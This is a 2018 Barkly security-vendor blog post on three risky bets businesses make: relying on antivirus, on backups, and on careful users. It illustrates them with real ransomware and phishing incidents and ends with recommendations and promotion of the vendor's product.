How to
Jonathan Crowe
Mar 2018

Malware Prevention: 3 Big, Risky Gambles SMBs Inadvertently Make

secure-or-lucky-1

When it comes to these three common security choices, many companies may not realize how heavily they're relying on the luck of the draw.

Counting on luck is something you do at the craps table or when you play the lottery. It obviously isn't a position you want to be in with your company's security on the line. 

Unfortunately, it's incredibly common for even large, well-funded organizations to take massive gambles by leaving elements of their security up to chance. In some cases, it’s simply a matter of not having enough time or resources to cover all the bases. In other cases — and this is more worrisome — it's a result of a fatalistic attitude toward security, a belief that because "compromise is inevitable" there's really only so much you can do. In the very worst cases, however, organizations may believe they're fully protected, only to realize after the fact that gaps in their current solutions and policies are forcing them to take much bigger gambles than they'd initially realized. 

Is your organization actually secure from malware, or just hoping its luck won't run out? 

Here are three of the most common risky mistakes companies make, along with a few cautionary tales and recommendations for safer bets.

Risky Mistake #1: Rolling the Dice with AV

rolling-the-dice-with-av.jpg

Photo by Dave Gough

With the rapid proliferation of new and more sophisticated malware and attack techniques, IT pros are increasingly losing faith in traditional antivirus (AV) solutions. According to the Ponemon Institute’s 2017 State of Endpoint Security Risk report, less than a third of organizations believe their AV can stop today’s malware threats. In fact, 4 out of 5 organizations either replaced or augmented their existing AV solutions in 2017.

The problem is many AVs still only block specific malware samples that they've seen before, or that have been reported on sites like VirusTotal. New variants are able to evade detection, as are samples that utilize polymorphic techniques to make small, superficial changes to their code each time they land on a new machine. Malware authors have no problem cranking out new samples and utilizing various techniques to obfuscate them, and as a result, most AVs are stuck in a perpetual state of playing catch-up and being left in the dark until it's too late. 

In a shift away from the signature-matching approach, NGAV and some AV solutions are now utilizing machine learning algorithms in order to help them predict whether a file is malicious or not, regardless of whether or not they've seen it before. To counter this development, attackers are increasingly adopting techniques that allow them to deploy their attacks filelessly, hijacking legitimate system tools and processes or executing malicious code directly in memory, instead.

That's a major problem since, with no file to scan or analyze, the majority of AV and NGAV solutions don't stand much of a chance.  

According to Ponemon, 77 percent of successful compromises in 2017 involved the use of fileless techniques. Attackers know a winner when they see one, and this year one out of every three attacks is expected to utilize fileless techniques. 

 

Real-life cautionary tales

"The tools we have in place didn't work. It's ahead of our tools."

— Brandi Simmons, spokesperson for the Colorado Office of Information Technology on the CDOT's second ransomware infection in eight days
  • In February, the Colorado Department of Transportation (CDOT) was forced to shut down 2,000 state computers and call in the FBI after a variant of SamSam ransomware infiltrated their network. The CDOT's antivirus provider, McAfee, wasn't able to block the attack. The best it could do was issue an update after-the-fact to ensure the ransomware would be blocked in the future. Yet, just eight days later, the CDOT was infected a second time with a "new" variant of SamSam that had been slightly altered. 

    "We had 20 percent of the computers up and running when our security tools detected malicious activity. And sure enough the variant of SamSam ransomware just keeps changing," a spokesperson for Colorado's Office of Information Technology said. "The tools we have in place didn't work. It's ahead of our tools."

  • Around the same time as the initial CDOT infection, the city of Allentown, PA experienced an outbreak that left the city's network infected with Emotet, a dangerous credential-stealing trojan that spreads quickly and is notoriously difficult to remove. The malware evaded the city’s AV defenses and infected many of its most critical systems, including an 185-camera surveillance network. The attack also forced the closure of several public safety operations and put a freeze on some of the city’s financial transactions. In total, the cost of removing the malware was estimated at $1 million.

  • Last June, San Francisco's public TV and radio station KQED found itself battling a ransomware infection despite having just updated its AV systems the morning of the attack. The station also had firewalls, email scanning, and multiple malware detection programs in place, but none of them prevented the ransomware from encrypting files and triggering a month-long recovery period. When asked to describe the disruptive impact of the attack one employee said, "It's like we've been bombed back to 20 years ago, technology-wise."  


The safer bet

For years, AV solutions have been a cornerstone in protecting endpoints from malware. But more and more of today's attacks are bypassing antivirus, exploiting well-documented limitations in what AV is able to see and detect. To close the gaps AV leaves them exposed to, companies need to invest in stronger, smarter endpoint protection designed to block malware with a more modern approach.

You can learn more about the specific gaps in AV and NGAV coverage by downloading our AV Gap Analysis whitepaper. In it, you'll also learn how Barkly can help you close those gaps and actually get ahead of the game. 

In addition to replacing or augmenting antivirus, there are several practical things organizations can do to reduce their exposure to attacks and render common malware delivery methods ineffective. We've collected these recommendations in our 2018 Cybersecurity Checklist, which you can download here.   

Risky Mistake #2: You're Tempting Fate with Backup

counting-on-backup.jpg

Photo by Fred Marie

Every organization should be using backup. No organization should be using it as a substitute for good security. 

Think of it this way — if you're go skydiving and your instructor says the primary parachute you're using fails all the time, but not to worry, you've got the backup chute, chances are you're not going to jump out of the airplane. 

Backup can help save the day if you get infected with ransomware, but it's never going to be better than preventing the infection in the first place. For one thing, the ability to recover quickly and successfully from backup should never be taken for granted. According to a survey we conducted with victims of ransomware, 58 percent were unable to recover all of their encrypted data from backup

Part of the problem is that backups can get infected and corrupted just like any other part of your network. In addition, if organizations don’t regularly practice actually recovering from their backups, they're making a lot of dangerous assumptions about how well things will work when it's no longer a drill.

Even in cases where data is successfully restored, the process of wiping, restoring, and bringing infected systems back online takes time and resources. 

Real-life cautionary tales

"The core components of the backup files...had been purposefully and permanently corrupted by the hackers. Thus...acquisition of the decryption keys was unavoidable."

— Steve Long, President and CEO of Hancock Health on a ransomware attack that infected the hospital in January 2018
  • Some attacks go out of their way to make recovering from backup more difficult or even impossible. Hancock Health, a regional hospital in Indiana faced one such attack in January, and was forced to pay out $55,000 in ransom to recover encrypted data. While it wasn't involved in that particular attack, the recently-discovered Zenis ransomware is another example of malware that not only encrypts files, but deletes backups. 

  • When employees working for Bingham County, Idaho discovered last February that they had been locked out of crucial emergency dispatch systems by ransomware, county officials initially thought they could simply wipe infected systems, restore them from backups, and avoid paying any ransom. Unfortunately, like many others, they discovered not all their servers could be restored.

    Bingham County wound up paying $3,500 in ransom, but the full cost of recovery and damages was far more substantial. In addition to the labor-intensive process of restoring data, the IT team had to completely rebuild its servers. When all was said and done, the total cost of recovery was estimated at $100,000.

  • That bill pales in comparison to the one Erie County Medical Center found itself footing last April. The hospital suffered massive financial and productivity loss after a ransomware attack took down 6,000 computers and forced hospital staff to resort to low-tech, manual processes, some of which hadn’t been used in twenty years. Despite having backups it was able to successfully restore from, the hospital's recovery process still took more than a month and racked up a total cost of $10 million.

The safer bet

Backup is an extremely important part of disaster preparedness, but it's no replacement for strong security. Each of the attack victims referenced above would likely agree an ounce of prevention is worth a pound of cure. If there's one big takeaway from their stories, it's that equal investment in preventative security solutions and policies is the safer bet. 

In terms of relying on backup, however, there are practical things organizations can do to help reduce inherent risk:

  • Embrace 3-2-1 backup: By having three copies of your data in two different locations, one of which isn't on your network, you can greatly improve your odds of actually having backups available when you need them most.

  • Use both image and file backup: Image backup (which creates a snapshot of your computer that allows you to restore your computer to a state it was in at a previous point in time) is easier to manage and quicker to restore than thousands of individual files. A file-based backup, on the other hand, allows for faster recovery of single files (allowing you to restore critical documents right away).

  • Test, test, test: As a best practice, testing your ability to restore systems from backup and how long it actually takes is a great way to anticipate the resources (financial and human) and time it will take to recover from a ransomware attack.

Risky Mistake #3: You're Betting on Good User Behavior

dumb-move.jpg

We can (and should) have faith in our colleagues. We can (and should) invest in training to help them be more aware of security risks and be savvier when it comes to avoiding them. But there’s a reason why they say “to err is human.”

Expecting any amount of effort, no matter how great, will completely shut the door on attacks that take advantage of user error isn't just unrealistic, it's also incredibly risky. 

Malicious emails continue to be one of the most common attack vectors for a reason — they still work. Attackers have invested in making them increasingly sophisticated and realistic, in some cases even hijacking user email accounts to send their contacts new emails and replies they wouldn't have any reason not to open and click. 
 

Real-life cautionary tales

  • In November, a Barkly user received what appeared to be a reply to an existing email chain. The new message pointed to an attached Word document, which made sense in the context of the email chain. The user opened the document and enabled macros, and that's when Barkly's behavior analysis detected a macro attempting to launch PowerShell code designed to download a malicious payload that was later determined to be the Ursnif banking trojan.

    By blocking the PowerShell script from executing, Barkly prevented the payload from being downloaded. By preventing the user from being infected, Barkly also prevented them from being turned into a new delivery vehicle for additional attacks, this time sent from their email account to their email contacts. 

  • In late February, the Financial Services Information Sharing and Analysis Center (FS-ISAC) circulated a notice to its members that a phishing attack on a FS-ISAC employee had compromised that employee's logon credentials. The employee's account was then used to launch additional phishing attacks against other FS-ISAC members. While this particular attack was contained quickly, it’s an excellent example how anyone can be fooled, even security experts whose job is to share details on the latest threats.

 

The safer bet

Once we accept that users will be users and mistakes will inevitably happen, the next thing organizations should do is accept that it isn't appropriate to put all the pressure on them to avoid and prevent attacks. The better move is to provide users with safety nets that proactively prevent and limit the possible damage caused by attacks that target them. 

After all, begging users to stop opening email attachments only goes so far. There are other things organizations can do that they have full control of, including:

Don’t just hope your luck will hold out. Get smart and take charge.

It may be tempting to rely on past good fortune to keep you out of harm’s way, but it only takes one attack to make you wish done more sooner. The good news is taking the steps covered here can help you avoid a harsh reality check when luck finally does run out. 

Find out how Barkly can protect your organization with stronger, smarter protection (not luck). See how it works. 

Jonathan Crowe

Jonathan Crowe

Jonathan covers the latest threats and cybersecurity trends from a practical point of view.

lock-white.png

Close the gaps in your security

Stop hoping you'll get lucky, get the strongest protection instead. See how Barkly blocks attacks that are getting past AV.

See a demo

Comments

Stay informed!

Get the latest security news, tips, and trends straight to your inbox.

Stay informed!

Get the latest security news, tips, and trends straight to your inbox.